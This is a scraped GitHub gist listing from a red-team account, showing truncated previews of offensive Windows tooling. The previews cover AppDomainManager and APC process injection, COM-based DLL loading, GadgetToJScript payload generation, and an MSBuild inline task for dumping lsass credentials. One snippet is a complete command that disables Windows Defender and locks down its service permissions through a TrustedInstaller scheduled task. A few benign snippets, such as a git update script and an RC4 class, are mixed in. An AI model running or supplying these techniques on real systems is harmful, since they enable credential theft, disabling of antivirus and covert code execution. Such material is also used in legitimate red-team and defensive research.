GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Steve Borosh rvrsh3ll
rvrsh3ll
/ DllLoadAnythingViaScript
Created
February 11, 2020 12:34
— forked from analyticsearch/DllLoadAnythingViaScript
DynamicWrapperX - Dropper , Registration-Free Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Doesn't Even Have to Be A Conformant COM DLL To trigger the load. | |
| # Sample DLL To inject here | |
| # https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179 | |
| $manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'; | |
| $ax = new-object -Com "Microsoft.Windows.ActCtx" | |
| $ax.ManifestText = $manifest; | |
| $DWX = $ax.CreateObject("JustMakeSomethingUp"); |
rvrsh3ll
/ GadgetToJScript Command Reference
Created
February 12, 2020 11:44
— forked from 3xpl01tc0d3r/GadgetToJScript Command Reference
GadgetToJScript Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to generate HTA code using GadgetsToJScript | |
| GadgetToJScript.exe -w hta | |
| # Command to generate JS code using GadgetsToJScript | |
| GadgetToJScript.exe -w js | |
| # Command to generate VBS code using GadgetsToJScript | |
| GadgetToJScript.exe -w vbs | |
| # Command to generate VBA code using GadgetsToJScript |
rvrsh3ll
/ Find-Assemblies.ps1
Last active
February 14, 2020 03:29
— forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Param([parameter(Mandatory=$true, | |
| HelpMessage="Directory to search for .NET Assemblies in.")] | |
| $Directory, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to search recursively.")] | |
| [switch]$Recurse = $false, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to include DLLs in the search.")] | |
| [switch]$DLLs = $false, | |
| [parameter(Mandatory=$false, |
rvrsh3ll
/ MSBuildProcDumper.csproj
Created
April 21, 2020 14:45
— forked from jackson5sec/MSBuildProcDumper.csproj
MSBuild - Process Dumper - lsass example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj --> | |
| <!-- Feel free to use a more aggressive class for testing. --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" |
rvrsh3ll
/ _Instructions_Reproduce.md
Created
April 29, 2020 20:46
GhostLoader - AppDomainManager - Injection - 攻壳机动队
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
rvrsh3ll
/ update_git_repos.sh
Created
May 26, 2020 14:45
— forked from douglas/update_git_repos.sh
Update all git repositories under a base directory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # store the current dir | |
| CUR_DIR=$(pwd) | |
| # Let the person running the script know what's going on. | |
| echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n" | |
| # Find all git repositories and update it to the master latest revision | |
| for i in $(find . -name ".git" | cut -c 3-); do |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class RC4 { | |
| public static byte[] Encrypt(byte[] pwd, byte[] data) { | |
| int a, i, j, k, tmp; | |
| int[] key, box; | |
| byte[] cipher; | |
| key = new int[256]; | |
| box = new int[256]; | |
| cipher = new byte[data.Length]; |
rvrsh3ll
/ APCInject.cpp
Created
October 28, 2020 12:27
— forked from Truneski/APCInject.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| #include <TlHelp32.h> | |
| int PpidInject() | |
| { | |
| HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
| PROCESSENTRY32 process = { 0 }; | |
| process.dwSize = sizeof(process); |
rvrsh3ll
/ DInjectQueuerAPC.cs
Created
November 20, 2020 15:10
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |